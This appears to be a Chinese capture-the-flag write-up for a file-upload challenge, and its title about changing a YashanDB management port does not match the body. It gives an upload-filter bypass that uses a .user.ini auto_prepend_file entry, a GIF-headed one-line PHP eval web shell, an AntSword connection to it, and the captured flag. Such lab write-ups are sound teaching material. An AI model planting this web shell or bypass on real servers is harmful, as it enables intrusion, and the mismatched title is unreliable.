YashanDB修改yasom管理端口的技术研究
2026/1/17 22:53:38
目录
- 题目链接
- 一、题目介绍
- 二、上传.user.ini文件
- 三、上传图片马(shell.png)
- 四、访问首页文件
- 五、连接蚁剑
题目链接
https://www.qsnctf.com/
一、题目介绍
这次我学聪明啦!老板说要对上传点进行php的大小写过滤!这下看你怎么办!
二、上传.user.ini文件
auto_prepend_file=shell.png
上传成功
三、上传图片马(shell.png)
GIF89a<?php @eval($_POST['cmd']);?>上传成功
四、访问首页文件
当访问 index.php 时,PHP 引擎启动,读取目录下的 .user.ini,发现配置要求先加载 sell.png,于是它会先执行 shell.png 里的恶意代码,再执行首页原本的代码。
五、连接蚁剑
启动蚁剑连接shell(pass:cmd)
http://challenge.qsnctf.com:33578/index.php
连接成功
flag在根目录
flag{8ebfefb382d94eed9e1ef57e401492e7}